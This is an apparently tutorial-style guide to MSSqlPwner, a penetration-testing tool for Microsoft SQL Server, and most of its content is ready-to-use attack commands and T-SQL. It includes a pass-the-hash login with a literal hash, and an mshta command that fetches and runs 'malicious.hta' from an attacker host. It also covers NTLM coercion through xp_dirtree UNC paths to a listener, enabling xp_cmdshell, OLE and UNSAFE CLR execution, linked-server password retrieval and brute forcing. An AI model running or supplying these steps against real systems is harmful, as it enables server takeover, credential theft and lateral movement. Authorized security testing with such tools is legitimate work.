
MSSqlPwner - Powerful Tool for MSSQL Server Security Testing
MSSqlPwner is a powerful penetration testing tool designed to exploit and assess the security of Microsoft SQL (MSSQL) servers.
Built on the Impacket framework, it supports authentication using clear-text passwords, NTLM hashes, and Kerberos tickets. This guide provides an overview of its features, installation, and usage.
Key Features of MSSqlPwner
- Command Execution: run operating-system commands through xp_cmdshell, sp_oacreate (OLE Automation) or a custom CLR assembly, selectable per command.
- Recursive Enumeration: walk linked servers and impersonation rights from the current login outward and record every reachable chain as a potential attack path.
- NTLM Coercion and Relay: force the SQL Server service account to authenticate to an attacker-controlled host using procedures such as xp_dirtree, xp_subdirs and xp_fileexist, so the NTLM authentication can be captured or relayed.
- Lateral Movement: execute on linked servers and escalate privileges along the impersonation chains discovered during enumeration.
- Authentication Methods: Windows credentials, MSSQL credentials, NTLM hashes (pass-the-hash) and Kerberos tickets.
- Brute Force: test lists of tickets, hashes or passwords against multiple hosts.
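To make the enumeration concrete, the T-SQL below is an added example of the checks a recursive walk of linked servers and impersonation rights has to run on every hop. It is not MSSqlPwner's own code; the linked server name SRV01 and the login sa are assumed for illustration.

```sql
-- Added example: manual version of the linked-server / impersonation enumeration
-- that MSSqlPwner automates. Not the tool's code; SRV01 and 'sa' are assumed names.

-- 1. Where am I and who am I?
SELECT @@SERVERNAME                  AS server_name,
       SYSTEM_USER                   AS login_name,
       USER_NAME()                   AS db_user,
       IS_SRVROLEMEMBER('sysadmin')  AS is_sysadmin;

-- 2. Linked servers reachable from this instance (the edges of the graph)
SELECT name, data_source, provider, is_rpc_out_enabled
FROM   sys.servers
WHERE  is_linked = 1;

-- 3. Server-level IMPERSONATE grants (who may become which login)
SELECT grantee.name AS grantee, target.name AS can_impersonate_login
FROM   sys.server_permissions p
JOIN   sys.server_principals  grantee ON grantee.principal_id = p.grantee_principal_id
JOIN   sys.server_principals  target  ON target.principal_id  = p.major_id
WHERE  p.class_desc      = 'SERVER_PRINCIPAL'
  AND  p.permission_name = 'IMPERSONATE'
  AND  p.state_desc      = 'GRANT';

-- 4. Database-level IMPERSONATE grants in the current database
SELECT grantee.name AS grantee, target.name AS can_impersonate_user
FROM   sys.database_permissions p
JOIN   sys.database_principals  grantee ON grantee.principal_id = p.grantee_principal_id
JOIN   sys.database_principals  target  ON target.principal_id  = p.major_id
WHERE  p.class_desc      = 'DATABASE_PRINCIPAL'
  AND  p.permission_name = 'IMPERSONATE'
  AND  p.state_desc      = 'GRANT';

-- 5. Use a right found in step 3: switch login, re-check privileges, switch back
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS now_running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
REVERT;

-- 6. Repeat steps 1-4 on a linked server. SYSTEM_USER on the far side is the login
--    the link maps to, not yours. OPENQUERY works whenever the link exists;
--    EXEC ... AT needs RPC Out enabled on the link (column shown in step 2).
SELECT * FROM OPENQUERY(SRV01,
    'SELECT @@SERVERNAME AS srv, SYSTEM_USER AS login_name,
            IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');
EXEC ('SELECT name FROM sys.servers WHERE is_linked = 1') AT SRV01;
```

The reason chains matter is visible in step 6: the login the remote instance sees comes from the link's stored login mapping, which is frequently far more privileged than the account you started with, and that remote login may in turn hold links or IMPERSONATE grants of its own.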
Installation
MSSqlPwner can be installed directly from its GitHub repository. Choose one of the following methods:
Using pip
pip install 'mssqlpwner@git+https://github.com/ScorpionesLabs/MSSqlPwner.git'
Using pipx (Recommended)
pipx install 'git+https://github.com/ScorpionesLabs/MSSqlPwner.git'
Once installed, the tool is invoked as mssqlpwner. For example, the following authenticates with an NTLM hash (pass-the-hash) as a Windows login and opens an interactive session:
mssqlpwner -hashes ':0CB6948805F797BF2A82807973B89537' 'Administrator'@172.16.2.12 -windows-auth interactive
Usage Examples
Interactive Mode
Start an interactive session against a target and issue commands live:
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
Command Execution
Execute commands on the current server or linked servers:
# Execute "hostname" on the current server using the custom-assembly method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
# Execute "hostname" command on a linked server (e.g., SRV01)
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
# Execute a command on SRV01 via sp_oacreate (OLE Automation) instead of the default method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
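The three execution methods selected by -command-execution-method correspond to the T-SQL below, added here as an illustration of what the tool causes to happen on the server (it is not MSSqlPwner's own code). Each method is off by default and enabling it requires sysadmin, which is what the impersonation chains are usually for. The assembly, class and procedure names in the CLR part are assumed.

```sql
-- Added example: the three execution methods written out in T-SQL.
-- Not MSSqlPwner's code; SqlInject, StoredProcedures and cmd_exec are assumed names.

-- Method 1: xp_cmdshell (disabled by default; enabling it needs sysadmin)
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;            RECONFIGURE;
EXEC master..xp_cmdshell 'hostname';

-- Method 2: OLE Automation (sp_OACreate) - instantiates a COM object inside the
-- service process. Output is not returned, so redirect it to a file.
EXEC sp_configure 'Ole Automation Procedures', 1;  RECONFIGURE;
DECLARE @shell INT, @hr INT;
EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr = 0
    -- Run(command, windowStyle = 0 hidden, waitOnReturn = 1)
    EXEC @hr = sp_OAMethod @shell, 'Run', NULL,
         'cmd.exe /c hostname > C:\Windows\Temp\hostname.txt', 0, 1;
EXEC sp_OADestroy @shell;

-- Method 3: custom CLR assembly. Needs CLR enabled and, with 'clr strict security'
-- (SQL Server 2017+), a signed assembly, a trusted-assembly hash, or (weakest)
-- TRUSTWORTHY on the database that will hold it.
EXEC sp_configure 'clr enabled', 1;  RECONFIGURE;
ALTER DATABASE master SET TRUSTWORTHY ON;   -- lab shortcut; leaves the instance weaker
GO
CREATE ASSEMBLY SqlInject
    FROM 'C:\Windows\Temp\SqlInject.dll'      -- path is read by the server, not the client
    WITH PERMISSION_SET = UNSAFE;
GO
CREATE PROCEDURE dbo.cmd_exec @cmd NVARCHAR(4000)
AS EXTERNAL NAME SqlInject.[StoredProcedures].cmd_exec;  -- assembly.[class].method
GO
EXEC dbo.cmd_exec 'hostname';
```

Two practical notes. Every sp_configure change above is written to the SQL Server error log ("Configuration option 'xp_cmdshell' changed from 0 to 1"), so these are the first things a defender looks for and should be reverted at the end of an engagement. The GO lines are client batch separators (sqlcmd, SSMS); CREATE PROCEDURE ... AS EXTERNAL NAME must start its own batch.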
NTLM Relay Attacks
Coerce the SQL Server service account into authenticating to an attacker-controlled host, so that its NTLM authentication can be captured or relayed by a listener running there:
# Make the server connect to 192.168.45.250 (the host running your capture/relay listener)
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
# Trigger the same coercion from a specific chain (e.g. a linked server), selected by its chain ID
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id <CHAIN_ID> ntlm-relay 192.168.45.250
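What the ntlm-relay command actually sends to the server is a UNC-path lookup. The T-SQL below is an added example of that coercion, not the tool's own code; 192.168.45.250 is the attacker host used in the page's examples and SRV01 is an assumed link name.

```sql
-- Added example: the coercion behind ntlm-relay. Not MSSqlPwner's code;
-- 192.168.45.250 is the listener host from the page, SRV01 an assumed link name.

-- Each of these makes the SQL Server *service account* open an SMB connection to
-- the UNC path and authenticate with NTLM. The share does not need to exist; the
-- connection attempt is enough. These procedures are callable by low-privileged
-- logins on many installations.
EXEC master..xp_dirtree   '\\192.168.45.250\share', 1, 1;   -- (path, depth, include files)
EXEC master..xp_subdirs   '\\192.168.45.250\share';
EXEC master..xp_fileexist '\\192.168.45.250\share\x.txt';

-- Trigger it through a linked server instead, so the *linked* instance's service
-- account is the one that authenticates to the listener. This is what selecting a
-- chain with -chain-id does in the tool. Requires RPC Out on the link.
EXEC ('EXEC master..xp_dirtree ''\\192.168.45.250\share'', 1, 1') AT SRV01;
```

The identity that goes over the wire is whichever account the coerced instance's service runs as. A domain service account yields a NetNTLMv2 response that can be cracked offline or relayed; a local or virtual service account authenticates as the machine account, which cannot be cracked but can still be relayed. Relay to SMB only succeeds against targets that do not require SMB signing; capture and relay are done by a separate listener such as Responder or ntlmrelayx, which the tool does not start for you.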
Direct Queries
Run SQL queries directly:
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"
Password Retrieval
Retrieve the stored passwords of linked-server logins. Note that the link is named with -link-server here and with -link-name in the earlier examples; run mssqlpwner -h to confirm the flag your installed version accepts:
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrieve-password
Brute Force
Test credentials against multiple hosts:
# Use tickets, hashes, and passwords for brute force attacks
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
# Use only hashes for brute force attacks
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
Advanced Functionalities
Chain Exploration
MSSqlPwner can identify impersonation chains to escalate privileges:
# Enumerate linked servers and impersonation chains
mssqlpwner corp.com/user:lab@192.168.1.65 enumerate
# Select a specific chain by its ID (from the enumerate output) for subsequent commands
mssqlpwner corp.com/user:lab@192.168.1.65 set-chain <CHAIN_ID>
Custom Assembly Injection
Load a custom CLR assembly (a DLL you supply) into the server so its methods can be called as stored procedures:
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth inject-custom-asm SqlInject.dll
Notes on Security and Ethics
MSSqlPwner is intended for use by security professionals in authorized environments only, such as penetration testing engagements or security audits with proper permissions.
Unauthorized use of this tool may violate laws and ethical guidelines.
This guide has covered MSSqlPwner's main capabilities and usage scenarios for MSSQL server assessment, lateral movement and privilege escalation. You can learn more and download MSSqlPwner from its GitHub repository.